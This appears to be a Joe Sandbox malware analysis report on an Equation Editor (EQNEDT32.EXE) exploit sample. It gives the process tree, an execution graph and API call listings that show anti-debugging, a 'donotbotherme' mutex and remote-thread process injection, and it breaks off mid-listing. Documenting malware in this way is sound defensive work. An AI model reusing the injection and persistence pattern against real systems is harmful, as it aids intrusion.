MD5 hash:5D798FF0BE2A8970D932568068ACFD9D
Has administrator privileges:
Programmed in:C, C++ or other language
Reputation:low

Chronological Activities

Analysis Process: EQNEDT32.EXE PID: 3420 Parent PID: 536

General

Start time:19:15:16
Start date:24/01/2018
Path:C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXE
Wow64 process (32bit):false
Commandline:'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Imagebase:0x77390000
File size:543304 bytes
MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
Has administrator privileges:
Programmed in:C, C++ or other language
Reputation:low

Chronological Activities

Analysis Process: iexplore.exe PID: 3444 Parent PID: 3420

General

Start time:19:15:17
Start date:24/01/2018
Path:C:\Program Files\Internet Explorer\iexplore.exe
Wow64 process (32bit):false
Commandline:C:\Program Files\Internet Explorer\iexplore.exe
Imagebase:0x77390000
File size:815312 bytes
MD5 hash:EE79D654A04333F566DF07EBDE217928
Has administrator privileges:
Programmed in:C, C++ or other language
Reputation:low

Chronological Activities

Analysis Process: explorer.exe PID: 3488 Parent PID: 2876

General

Start time:19:15:18
Start date:24/01/2018
Path:C:\Windows\explorer.exe
Wow64 process (32bit):false
Commandline:explorer.exe C:\Windows\system32\rundll32.exe C:\Users\user\AppData\Roaming\Microsoft\Windows\Caches\NavShExt.dll,Setting
Imagebase:0x77390000
File size:2972672 bytes
MD5 hash:6DDCA324434FFA506CF7DC4E51DB7935
Has administrator privileges:
Programmed in:C, C++ or other language
Reputation:low

Chronological Activities

Analysis Process: EQNEDT32.EXE PID: 3496 Parent PID: 536

General

Start time:19:15:18
Start date:24/01/2018
Path:C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXE
Wow64 process (32bit):false
Commandline:'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Imagebase:0x77390000
File size:543304 bytes
MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
Has administrator privileges:
Programmed in:C, C++ or other language
Reputation:low

Chronological Activities

Analysis Process: explorer.exe PID: 3544 Parent PID: 536

General

Start time:19:15:18
Start date:24/01/2018
Path:C:\Windows\explorer.exe
Wow64 process (32bit):false
Commandline:C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
Imagebase:0x77390000
File size:2972672 bytes
MD5 hash:6DDCA324434FFA506CF7DC4E51DB7935
Has administrator privileges:
Programmed in:C, C++ or other language
Reputation:low

Chronological Activities

Disassembly

Code Analysis

Reset < >

    Analysis Process: EQNEDT32.EXE PID: 3420 Parent PID: 536

    Execution Graph

    Execution Coverage:10.6%
    Dynamic/Decrypted Code Coverage:0%
    Signature Coverage:15.9%
    Total number of Nodes:207
    Total number of Limit Nodes:13

    Graph

    execution_graph 876 617b223d IsDebuggerPresent 877 617b2260 CreateMutexA GetLastError 876->877 883 617b2734 876->883 878 617b227e 877->878 879 617b2291 CloseHandle memset SHGetSpecialFolderPathA 877->879 878->879 882 617b2285 CloseHandle 878->882 879->883 884 617b22cd 879->884 881 617b2741 882->883 914 617b2860 883->914 905 617b2870 884->905 887 617b23ed 887->887 888 617b23f8 MultiByteToWideChar GetModuleHandleW 887->888 889 617b246b 888->889 889->889 890 617b2476 GetProcAddress 889->890 890->883 891 617b2494 CreateProcessA 890->891 891->883 892 617b24bb memset GetModuleFileNameA 891->892 893 617b24f3 892->893 893->893 894 617b254f GetProcAddress 893->894 894->883 895 617b256d GetProcAddress 894->895 895->883 897 617b25e5 VirtualAllocEx WriteProcessMemory 895->897 898 617b2625 897->898 899 617b2714 VirtualFreeEx 897->899 898->899 901 617b2631 898->901 900 617b2728 CloseHandle 899->900 900->883 901->901 902 617b268b GetProcAddress 901->902 902->883 903 617b26ad CreateRemoteThread 902->903 903->900 904 617b26cb WaitForSingleObject GetExitCodeThread CreateRemoteThread WaitForSingleObject 903->904 904->900 906 617b2881 905->906 907 617b2888 _errno 905->907 906->907 909 617b28aa 906->909 912 617b28bc 906->912 908 617b2892 907->908 918 617b284f 908->918 909->907 911 617b2376 memset 911->887 912->911 913 617b28cd _errno 912->913 913->908 915 617b286b SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 914->915 916 617b2868 914->916 915->881 916->881 919 617b27a9 OutputDebugStringA 918->919 920 617b2860 4 API calls 919->920 921 617b284d 920->921 921->911 993 617b2dbb 996 617b2dc7 993->996 994 617b2de7 995 617b2c34 10 API calls 998 617b2e59 995->998 996->994 996->995 996->998 997 617b2c34 10 API calls 997->994 998->994 999 617b2c34 10 API calls 998->999 1000 617b2f13 998->1000 999->1000 1000->994 1000->997 1007 617b350f 1008 617b2860 4 API calls 1007->1008 1009 617b3523 1008->1009 1010 617b2860 4 API calls 1009->1010 1011 617b352d 1010->1011 1001 617b34d1 1002 617b2860 4 API calls 1001->1002 1003 617b34e2 1002->1003 922 617b2ee6 925 617b2bce 922->925 924 617b2ef7 926 617b2bdd _XcptFilter 925->926 927 617b2bea 925->927 926->924 927->924 1016 617b3017 1017 617b3027 1016->1017 1018 617b3022 1016->1018 1020 617b3362 1018->1020 1021 617b3387 1020->1021 1022 617b3394 GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 1020->1022 1021->1022 1023 617b338b 1021->1023 1022->1023 1023->1017 1024 617b2974 1025 617b2986 1024->1025 1027 617b2994 @_EH4_CallFilterFunc@8 1024->1027 1026 617b2860 4 API calls 1025->1026 1026->1027 1028 617b202c memset 1029 617b208b 1028->1029 1029->1029 1030 617b2096 MultiByteToWideChar 1029->1030 1031 617b217e 1030->1031 1031->1031 1032 617b2189 MultiByteToWideChar 1031->1032 1044 617b1e97 1032->1044 1035 617b221f 1036 617b2860 4 API calls 1035->1036 1038 617b2232 1036->1038 1042 617b21e2 1042->1035 1043 617b2205 UnmapViewOfFile CloseHandle 1042->1043 1043->1035 1045 617b1ede 1044->1045 1045->1045 1046 617b1ee9 GetModuleHandleA 1045->1046 1047 617b1f2e 1046->1047 1047->1047 1048 617b1f39 GetProcAddress 1047->1048 1049 617b1f4c 1048->1049 1050 617b2860 4 API calls 1049->1050 1051 617b1f5f 1050->1051 1051->1035 1052 617b1176 ??2@YAPAXI memset 1051->1052 1053 617b11b4 memcpy 1052->1053 1053->1053 1054 617b11df 1053->1054 1055 617b11e8 memcpy 1054->1055 1056 617b1200 1054->1056 1055->1056 1057 617b121e ??2@YAPAXI 1056->1057 1060 617b1204 ??3@YAXPAX 1056->1060 1073 617b103a 1057->1073 1061 617b2860 4 API calls 1060->1061 1062 617b121c 1061->1062 1063 617b1276 1062->1063 1064 617b1289 1063->1064 1065 617b12a2 CreateFileMappingA MapViewOfFile 1064->1065 1066 617b12eb ??3@YAXPAX 1064->1066 1065->1066 1067 617b12c6 1065->1067 1066->1042 1088 617b14e9 memmove 1067->1088 1069 617b12cb 1092 617b1319 1069->1092 1072 617b12d9 UnmapViewOfFile CloseHandle 1072->1066 1074 617b1049 __EH_prolog3_GS 1073->1074 1075 617b1081 ??2@YAPAXI memset 1074->1075 1076 617b1170 1074->1076 1078 617b10bf ??3@YAXPAX ??3@YAXPAX 1075->1078 1079 617b10dd 1075->1079 1085 617b34b7 1076->1085 1078->1076 1084 617b1910 ??2@YAPAXI ??2@YAPAXI 1079->1084 1082 617b111d 1083 617b1128 ??2@YAPAXI memcpy ??3@YAXPAX ??3@YAXPAX 1082->1083 1083->1076 1084->1082 1086 617b2860 4 API calls 1085->1086 1087 617b1175 1086->1087 1087->1060 1089 617b1556 1088->1089 1090 617b151e 1088->1090 1089->1069 1090->1089 1091 617b1531 memmove 1090->1091 1091->1090 1093 617b1347 1092->1093 1094 617b1341 1092->1094 1093->1094 1095 617b1353 memset 1093->1095 1098 617b139c GetModuleHandleA 1093->1098 1101 617b13e7 GetProcAddress 1093->1101 1102 617b140a GetProcAddress 1093->1102 1096 617b2860 4 API calls 1094->1096 1095->1093 1097 617b12d5 1096->1097 1097->1066 1097->1072 1098->1093 1099 617b13ad GetLastError LoadLibraryExA 1098->1099 1099->1093 1100 617b1461 GetLastError 1099->1100 1100->1094 1101->1093 1102->1093 1102->1094 931 617b2e30 932 617b2e38 931->932 934 617b2f8a 932->934 939 617b2c34 932->939 935 617b2e59 935->934 937 617b2c34 10 API calls 935->937 938 617b2f13 935->938 936 617b2c34 10 API calls 936->934 937->938 938->934 938->936 940 617b2c43 939->940 941 617b2c69 939->941 942 617b2d47 InterlockedCompareExchange 940->942 957 617b2c62 940->957 943 617b2c9f InterlockedCompareExchange 941->943 947 617b2c92 Sleep 941->947 948 617b2ca7 941->948 941->957 944 617b2d50 942->944 945 617b2d3a Sleep 942->945 943->941 943->948 946 617b2d5a _amsg_exit 944->946 956 617b2d64 944->956 945->942 946->957 947->943 949 617b2cbc _amsg_exit 948->949 950 617b2cc5 __initterm_e 948->950 952 617b2cfe 949->952 955 617b2ce8 _initterm 950->955 950->957 951 617b2d9e InterlockedExchange 951->957 953 617b2d06 InterlockedExchange 952->953 952->957 953->957 954 617b2d88 free 954->951 955->952 956->951 956->954 957->935 958 617b2efa 959 617b2eff 958->959 960 617b2c34 10 API calls 959->960 961 617b2f13 960->961 962 617b2c34 10 API calls 961->962 963 617b2f8a 961->963 962->963 1106 617b333d 1109 617b2a40 1106->1109 1108 617b335d 1110 617b2a6b 1109->1110 1112 617b2ae2 1110->1112 1113 617b2a06 RtlUnwind 1110->1113 1112->1108 1113->1112 964 617b2e72 967 617b2e7a 964->967 965 617b2f8a 966 617b2c34 10 API calls 966->965 967->965 968 617b2c34 10 API calls 967->968 969 617b2f13 967->969 968->969 969->965 969->966 1114 617b1f61 1115 617b1fa8 1114->1115 1115->1115 1116 617b1fb3 GetModuleHandleA 1115->1116 1117 617b1ff8 1116->1117 1117->1117 1118 617b2003 GetProcAddress 1117->1118 1119 617b2020 1118->1119 1120 617b2860 4 API calls 1119->1120 1121 617b202a 1120->1121 970 617b34ec 973 617b1009 970->973 972 617b34f8 977 617b343a 973->977 975 617b1015 ??3@YAXPAX ??3@YAXPAX 976 617b1037 975->976 976->972 977->975 978 617b2c12 malloc 979 617b2c2c 978->979 980 617b2f29 981 617b2f2e 980->981 982 617b2c34 10 API calls 981->982 983 617b2f8a 981->983 982->983 1125 617b275c __CxxFrameHandler 1129 617b2e1c 1130 617b2bce _XcptFilter 1129->1130 1131 617b2e2d 1130->1131 984 617b2eb5 985 617b2ebd 984->985 986 617b2f13 985->986 988 617b2c34 10 API calls 985->988 987 617b2c34 10 API calls 986->987 989 617b2f8a 986->989 987->989 988->986

    Callgraph

    • Executed
    • Not Executed
    • Opacity -> Relevance
    • Disassembly available
    callgraph 0 Function_617B31E0 1 Function_617B29D6 2 Function_617B103A 4 Function_617B34B7 2->4 30 Function_617B1910 2->30 64 Function_617B346D 2->64 81 Function_617B1C13 2->81 3 Function_617B284F 28 Function_617B2860 3->28 4->28 5 Function_617B18AD 29 Function_617B1E6F 5->29 41 Function_617B17F6 5->41 6 Function_617B2EA1 42 Function_617B2BCE 6->42 7 Function_617B343A 8 Function_617B14E9 9 Function_617B1319 9->28 10 Function_617B1570 11 Function_617B2E30 36 Function_617B2C34 11->36 65 Function_617B3329 11->65 66 Function_617B2746 11->66 77 Function_617B300C 11->77 12 Function_617B2C12 13 Function_617B2F29 13->36 13->65 13->77 14 Function_617B146B 15 Function_617B2FA3 15->65 15->77 16 Function_617B2BEE 17 Function_617B1B02 67 Function_617B184A 17->67 18 Function_617B34A3 19 Function_617B16C1 20 Function_617B2EB5 20->36 20->65 20->66 20->77 21 Function_617B3504 22 Function_617B2F15 22->42 23 Function_617B2DBB 35 Function_617B32E4 23->35 23->36 23->65 23->66 23->77 24 Function_617B28E4 49 Function_617B31DC 24->49 60 Function_617B31BD 24->60 25 Function_617B16FA 26 Function_617B350F 26->28 27 Function_617B1A20 27->41 79 Function_617B17B8 27->79 29->41 31 Function_617B2A40 31->1 44 Function_617B3264 31->44 46 Function_617B29ED 31->46 53 Function_617B2A20 31->53 75 Function_617B2A06 31->75 32 Function_617B2974 32->24 32->28 33 Function_617B3362 34 Function_617B15D9 36->16 36->44 37 Function_617B2F8F 37->42 38 Function_617B3400 39 Function_617B1F61 39->28 40 Function_617B1009 40->7 40->18 54 Function_617B1785 41->54 43 Function_617B166F 44->0 44->35 44->65 84 Function_617B3220 44->84 45 Function_617B2870 45->3 46->60 47 Function_617B2E1C 47->42 48 Function_617B1001 50 Function_617B34F9 51 Function_617B223D 51->28 51->45 52 Function_617B2EE6 52->42 53->24 55 Function_617B31B4 56 Function_617B2EFA 56->36 56->65 56->77 57 Function_617B2E72 57->36 57->65 57->66 57->77 58 Function_617B34EC 58->40 59 Function_617B2FEA 59->65 59->77 61 Function_617B1E97 61->28 62 Function_617B1176 62->2 62->28 63 Function_617B171C 68 Function_617B2FD6 68->42 69 Function_617B34D1 69->28 70 Function_617B2F5E 70->36 70->65 70->77 71 Function_617B1276 71->8 71->9 71->10 71->14 71->34 72 Function_617B3017 72->33 73 Function_617B1953 73->19 73->25 73->41 74 Function_617B32BE 74->65 76 Function_617B29BA 76->24 78 Function_617B202C 78->28 78->43 78->61 78->62 78->71 79->54 80 Function_617B333D 80->31 81->5 81->17 81->19 81->25 81->27 81->41 81->63 81->73 82 Function_617B32AA 83 Function_617B275C 85 Function_617B2E5E 85->42 86 Function_617B2F4A 86->42 87 Function_617B3110 88 Function_617B34C6

    Executed Functions

    Function 617B223D, Relevance: 47.6, APIs: 26, Strings: 1, Instructions: 375librarythreadinjection

    Control-flow Graph

    APIs
    • IsDebuggerPresent.KERNEL32 ref: 617B2252
    • CreateMutexA.KERNELBASE(00000000,00000001,donotbotherme), ref: 617B226C
    • GetLastError.KERNEL32 ref: 617B2274
    • CloseHandle.KERNEL32(00000000), ref: 617B2286
    • CloseHandle.KERNEL32(00000000), ref: 617B2292
    • memset.MSVCRT ref: 617B22AB
    • SHGetSpecialFolderPathA.SHELL32(00000000,?,00000026,00000001), ref: 617B22BF
      • Part of subcall function 617B2870: _errno.MSVCRT ref: 617B2888
      • Part of subcall function 617B2870: _errno.MSVCRT ref: 617B28CF
    • memset.MSVCRT ref: 617B2380
    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,0000000D,?,0000000D), ref: 617B2416
    • GetModuleHandleW.KERNEL32(?), ref: 617B2420
    • GetProcAddress.KERNEL32(?,?), ref: 617B248A
    • CreateProcessA.KERNEL32(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?), ref: 617B24B1
    • memset.MSVCRT ref: 617B24CE
    • GetModuleFileNameA.KERNEL32(?,00000104), ref: 617B24E4
    • GetProcAddress.KERNEL32(?,?), ref: 617B255D
    • GetProcAddress.KERNEL32(?,?), ref: 617B25D5
    • VirtualAllocEx.KERNELBASE(?,00000000,?,00001000,00000004), ref: 617B25F5
    • WriteProcessMemory.KERNELBASE(?,00000000,?,?,?), ref: 617B2617
    • GetProcAddress.KERNEL32(?,?), ref: 617B2699
    • CreateRemoteThread.KERNEL32(?,00000000,00000000,?,00000000,00000000), ref: 617B26C3
    • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 617B26DA
    • GetExitCodeThread.KERNEL32(00000000,?), ref: 617B26E4
    • CreateRemoteThread.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000000), ref: 617B2707
    • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 617B2710
    • VirtualFreeEx.KERNEL32(?,?,?,00001000), ref: 617B2722
    • CloseHandle.KERNEL32(?), ref: 617B272E
      • Part of subcall function 617B2860: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 617B30EA
      • Part of subcall function 617B2860: UnhandledExceptionFilter.KERNEL32(617B4108), ref: 617B30F5
      • Part of subcall function 617B2860: GetCurrentProcess.KERNEL32(C0000409), ref: 617B3100
      • Part of subcall function 617B2860: TerminateProcess.KERNEL32(00000000), ref: 617B3107
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.479478668.617B1000.00000020.sdmp, Offset: 617B0000, based on PE: true
    • Associated: 00000002.00000002.479470190.617B0000.00000002.sdmp
    • Associated: 00000002.00000002.479489530.617B4000.00000002.sdmp
    • Associated: 00000002.00000002.479502718.617B5000.00000004.sdmp
    • Associated: 00000002.00000002.479514676.617B6000.00000008.sdmp
    • Associated: 00000002.00000002.479527170.617C2000.00000004.sdmp
    • Associated: 00000002.00000002.479536546.617C4000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_617b0000_EQNEDT32.jbxd

    Non-executed Functions

    Function 617B3362, Relevance: 7.5, APIs: 5, Instructions: 49timethread

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 145 617b3362-617b3385 146 617b3387-617b3389 145->146 147 617b3394-617b33d1 GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 145->147 146->147 150 617b338b-617b3392 146->150 148 617b33d3-617b33d9 147->148 149 617b33db 147->149 148->149 151 617b33e0-617b33ee 148->151 149->151 152 617b33ef-617b33f2 150->152 151->152
    APIs
    • GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 617B3399
    • GetCurrentProcessId.KERNEL32 ref: 617B33A5
    • GetCurrentThreadId.KERNEL32 ref: 617B33AD
    • GetTickCount.KERNEL32 ref: 617B33B5
    • QueryPerformanceCounter.KERNEL32(?), ref: 617B33C1
    Memory Dump Source
    • Source File: 00000002.00000002.479478668.617B1000.00000020.sdmp, Offset: 617B0000, based on PE: true
    • Associated: 00000002.00000002.479470190.617B0000.00000002.sdmp
    • Associated: 00000002.00000002.479489530.617B4000.00000002.sdmp
    • Associated: 00000002.00000002.479502718.617B5000.00000004.sdmp
    • Associated: 00000002.00000002.479514676.617B6000.00000008.sdmp
    • Associated: 00000002.00000002.479527170.617C2000.00000004.sdmp
    • Associated: 00000002.00000002.479536546.617C4000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_617b0000_EQNEDT32.jbxd
    Function 617B2860, Relevance: 6.0, APIs: 4, Instructions: 48

    Control-flow Graph

    APIs
    • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 617B30EA
    • UnhandledExceptionFilter.KERNEL32(617B4108), ref: 617B30F5
    • GetCurrentProcess.KERNEL32(C0000409), ref: 617B3100
    • TerminateProcess.KERNEL32(00000000), ref: 617B3107
    Memory Dump Source
    • Source File: 00000002.00000002.479478668.617B1000.00000020.sdmp, Offset: 617B0000, based on PE: true
    • Associated: 00000002.00000002.479470190.617B0000.00000002.sdmp
    • Associated: 00000002.00000002.479489530.617B4000.00000002.sdmp
    • Associated: 00000002.00000002.479502718.617B5000.00000004.sdmp
    • Associated: 00000002.00000002.479514676.617B6000.00000008.sdmp
    • Associated: 00000002.00000002.479527170.617C2000.00000004.sdmp
    • Associated: 00000002.00000002.479536546.617C4000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_617b0000_EQNEDT32.jbxd
    Function 617B2C34, Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 124sleep

    Control-flow Graph

    APIs
    • Sleep.KERNEL32(000003E8), ref: 617B2C97
    • InterlockedCompareExchange.KERNEL32(617C312C,?,00000000), ref: 617B2CA1
    • _amsg_exit.MSVCRT ref: 617B2CBE
    • __initterm_e.LIBCMT ref: 617B2CD9
    • _initterm.MSVCRT ref: 617B2CF2
    • InterlockedExchange.KERNEL32(617C312C,00000000), ref: 617B2D08
    • Sleep.KERNEL32(000003E8), ref: 617B2D3F
    • InterlockedCompareExchange.KERNEL32(617C312C,00000001,00000000), ref: 617B2D4A
    • _amsg_exit.MSVCRT ref: 617B2D5C
    • free.MSVCRT(00000000), ref: 617B2D89
    • InterlockedExchange.KERNEL32(617C312C,00000000), ref: 617B2DAB
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.479478668.617B1000.00000020.sdmp, Offset: 617B0000, based on PE: true
    • Associated: 00000002.00000002.479470190.617B0000.00000002.sdmp
    • Associated: 00000002.00000002.479489530.617B4000.00000002.sdmp
    • Associated: 00000002.00000002.479502718.617B5000.00000004.sdmp
    • Associated: 00000002.00000002.479514676.617B6000.00000008.sdmp
    • Associated: 00000002.00000002.479527170.617C2000.00000004.sdmp
    • Associated: 00000002.00000002.479536546.617C4000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_617b0000_EQNEDT32.jbxd
    Function 617B103A, Relevance: 13.6, APIs: 9, Instructions: 77

    Control-flow Graph

    APIs
    Memory Dump Source
    • Source File: 00000002.00000002.479478668.617B1000.00000020.sdmp, Offset: 617B0000, based on PE: true
    • Associated: 00000002.00000002.479470190.617B0000.00000002.sdmp
    • Associated: 00000002.00000002.479489530.617B4000.00000002.sdmp
    • Associated: 00000002.00000002.479502718.617B5000.00000004.sdmp
    • Associated: 00000002.00000002.479514676.617B6000.00000008.sdmp
    • Associated: 00000002.00000002.479527170.617C2000.00000004.sdmp
    • Associated: 00000002.00000002.479536546.617C4000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_617b0000_EQNEDT32.jbxd
    Function 617B202C, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 147file

    Control-flow Graph

    APIs
    • memset.MSVCRT ref: 617B205D
    • MultiByteToWideChar.KERNEL32(00000000,00000000,00000064,000000FF,?,00000064), ref: 617B20B1
    • MultiByteToWideChar.KERNEL32(00000000,00000000,00000096,000000FF,?,0000005E), ref: 617B219E
      • Part of subcall function 617B1E97: GetModuleHandleA.KERNEL32(000000F6), ref: 617B1EF1
      • Part of subcall function 617B1E97: GetProcAddress.KERNEL32(00000000,000000F6), ref: 617B1F42
    • ??3@YAXPAX@Z.MSVCRT ref: 617B21D3
    • UnmapViewOfFile.KERNEL32(?), ref: 617B220F
    • CloseHandle.KERNEL32(?), ref: 617B2219
      • Part of subcall function 617B2860: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 617B30EA
      • Part of subcall function 617B2860: UnhandledExceptionFilter.KERNEL32(617B4108), ref: 617B30F5
      • Part of subcall function 617B2860: GetCurrentProcess.KERNEL32(C0000409), ref: 617B3100
      • Part of subcall function 617B2860: TerminateProcess.KERNEL32(00000000), ref: 617B3107
      • Part of subcall function 617B1176: ??2@YAPAXI@Z.MSVCRT ref: 617B1195
      • Part of subcall function 617B1176: memset.MSVCRT ref: 617B11A5
      • Part of subcall function 617B1176: memcpy.MSVCRT ref: 617B11C1
      • Part of subcall function 617B1176: memcpy.MSVCRT ref: 617B11F2
      • Part of subcall function 617B1176: ??3@YAXPAX@Z.MSVCRT ref: 617B1207
      • Part of subcall function 617B1176: ??2@YAPAXI@Z.MSVCRT ref: 617B1224
      • Part of subcall function 617B1276: CreateFileMappingA.KERNEL32(000000FF,00000000,00000040,00000000,00000000,00000000), ref: 617B12AA
      • Part of subcall function 617B1276: MapViewOfFile.KERNEL32(00000000,00000022,00000000,00000000,00000000), ref: 617B12B9
      • Part of subcall function 617B1276: UnmapViewOfFile.KERNEL32(?), ref: 617B12DC
      • Part of subcall function 617B1276: CloseHandle.KERNEL32(?), ref: 617B12E5
    Strings
    • Cm})2&!j[V&p*njS!EnYqWSBj|WHZFB?, xrefs: 617B21FA
    Memory Dump Source
    • Source File: 00000002.00000002.479478668.617B1000.00000020.sdmp, Offset: 617B0000, based on PE: true
    • Associated: 00000002.00000002.479470190.617B0000.00000002.sdmp
    • Associated: 00000002.00000002.479489530.617B4000.00000002.sdmp
    • Associated: 00000002.00000002.479502718.617B5000.00000004.sdmp
    • Associated: 00000002.00000002.479514676.617B6000.00000008.sdmp
    • Associated: 00000002.00000002.479527170.617C2000.00000004.sdmp
    • Associated: 00000002.00000002.479536546.617C4000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_617b0000_EQNEDT32.jbxd
    Function 617B1319, Relevance: 10.6, APIs: 7, Instructions: 114library

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 108 617b1319-617b133f 109 617b1347-617b134e 108->109 110 617b1341-617b1342 108->110 112 617b143d-617b1441 109->112 111 617b144c-617b1460 call 617b2860 110->111 113 617b1447-617b1449 112->113 114 617b1353-617b1384 memset 112->114 117 617b144a-617b144b 113->117 116 617b1386-617b138a 114->116 119 617b138c-617b139a 116->119 120 617b139c-617b13ab GetModuleHandleA 116->120 117->111 119->116 119->120 121 617b13cc-617b13d6 120->121 122 617b13ad-617b13c6 GetLastError LoadLibraryExA 120->122 123 617b13d8-617b13db 121->123 124 617b143a 121->124 122->121 125 617b1461 GetLastError 122->125 127 617b13de-617b13e5 123->127 124->112 126 617b1467-617b1469 125->126 126->117 128 617b13e7-617b13f9 GetProcAddress 127->128 129 617b1405-617b1408 127->129 130 617b13fb-617b1403 128->130 131 617b141b-617b1438 128->131 132 617b140a-617b1419 GetProcAddress 129->132 130->132 131->124 131->127 132->126 132->131
    APIs
    • memset.MSVCRT ref: 617B136F
    • GetModuleHandleA.KERNEL32(?,?,00000000,00000000), ref: 617B13A0
    • GetLastError.KERNEL32(?,00000000,00000000), ref: 617B13AD
    • LoadLibraryExA.KERNEL32(?,00000000,00000008,?,00000000,00000000), ref: 617B13BB
    • GetProcAddress.KERNEL32(?,00000000,?,00000000,00000000), ref: 617B13F1
    • GetProcAddress.KERNEL32(?,?,?,00000000,00000000), ref: 617B1411
      • Part of subcall function 617B2860: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 617B30EA
      • Part of subcall function 617B2860: UnhandledExceptionFilter.KERNEL32(617B4108), ref: 617B30F5
      • Part of subcall function 617B2860: GetCurrentProcess.KERNEL32(C0000409), ref: 617B3100
      • Part of subcall function 617B2860: TerminateProcess.KERNEL32(00000000), ref: 617B3107
    • GetLastError.KERNEL32(?,00000000,00000000), ref: 617B1461
    Memory Dump Source
    • Source File: 00000002.00000002.479478668.617B1000.00000020.sdmp, Offset: 617B0000, based on PE: true
    • Associated: 00000002.00000002.479470190.617B0000.00000002.sdmp
    • Associated: 00000002.00000002.479489530.617B4000.00000002.sdmp
    • Associated: 00000002.00000002.479502718.617B5000.00000004.sdmp
    • Associated: 00000002.00000002.479514676.617B6000.00000008.sdmp
    • Associated: 00000002.00000002.479527170.617C2000.00000004.sdmp
    • Associated: 00000002.00000002.479536546.617C4000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_617b0000_EQNEDT32.jbxd
    Function 617B1176, Relevance: 9.1, APIs: 6, Instructions: 94

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 133 617b1176-617b11ad ??2@YAPAXI@Z memset 134 617b11b4-617b11dd memcpy 133->134 134->134 135 617b11df-617b11e6 134->135 136 617b11e8-617b11fa memcpy 135->136 137 617b1200-617b1202 135->137 136->137 138 617b121e-617b1274 ??2@YAPAXI@Z call 617b103a 137->138 139 617b1204 137->139 140 617b1206-617b1216 ??3@YAXPAX@Z 138->140 139->140 143 617b1217 call 617b2860 140->143 144 617b121c-617b121d 143->144
    APIs
    • ??2@YAPAXI@Z.MSVCRT ref: 617B1195
    • memset.MSVCRT ref: 617B11A5
    • memcpy.MSVCRT ref: 617B11C1
    • memcpy.MSVCRT ref: 617B11F2
    • ??3@YAXPAX@Z.MSVCRT ref: 617B1207
      • Part of subcall function 617B2860: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 617B30EA
      • Part of subcall function 617B2860: UnhandledExceptionFilter.KERNEL32(617B4108), ref: 617B30F5
      • Part of subcall function 617B2860: GetCurrentProcess.KERNEL32(C0000409), ref: 617B3100
      • Part of subcall function 617B2860: TerminateProcess.KERNEL32(00000000), ref: 617B3107
    • ??2@YAPAXI@Z.MSVCRT ref: 617B1224
      • Part of subcall function 617B103A: __EH_prolog3_GS.LIBCMT ref: 617B1044
      • Part of subcall function 617B103A: ??2@YAPAXI@Z.MSVCRT ref: 617B1093
      • Part of subcall function 617B103A: memset.MSVCRT ref: 617B10A3
      • Part of subcall function 617B103A: ??3@YAXPAX@Z.MSVCRT ref: 617B10C7
      • Part of subcall function 617B103A: ??3@YAXPAX@Z.MSVCRT ref: 617B10D1
      • Part of subcall function 617B103A: ??2@YAPAXI@Z.MSVCRT ref: 617B112F
      • Part of subcall function 617B103A: memcpy.MSVCRT ref: 617B1143
      • Part of subcall function 617B103A: ??3@YAXPAX@Z.MSVCRT ref: 617B1159
      • Part of subcall function 617B103A: ??3@YAXPAX@Z.MSVCRT ref: 617B1168
    Memory Dump Source
    • Source File: 00000002.00000002.479478668.617B1000.00000020.sdmp, Offset: 617B0000, based on PE: true
    • Associated: 00000002.00000002.479470190.617B0000.00000002.sdmp
    • Associated: 00000002.00000002.479489530.617B4000.00000002.sdmp
    • Associated: 00000002.00000002.479502718.617B5000.00000004.sdmp
    • Associated: 00000002.00000002.479514676.617B6000.00000008.sdmp
    • Associated: 00000002.00000002.479527170.617C2000.00000004.sdmp
    • Associated: 00000002.00000002.479536546.617C4000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_617b0000_EQNEDT32.jbxd
    Function 617B1276, Relevance: 6.1, APIs: 4, Instructions: 64file

    Control-flow Graph

    APIs
    • CreateFileMappingA.KERNEL32(000000FF,00000000,00000040,00000000,00000000,00000000), ref: 617B12AA
    • MapViewOfFile.KERNEL32(00000000,00000022,00000000,00000000,00000000), ref: 617B12B9
      • Part of subcall function 617B14E9: memmove.MSVCRT ref: 617B1509
      • Part of subcall function 617B14E9: memmove.MSVCRT ref: 617B153F
      • Part of subcall function 617B1319: memset.MSVCRT ref: 617B136F
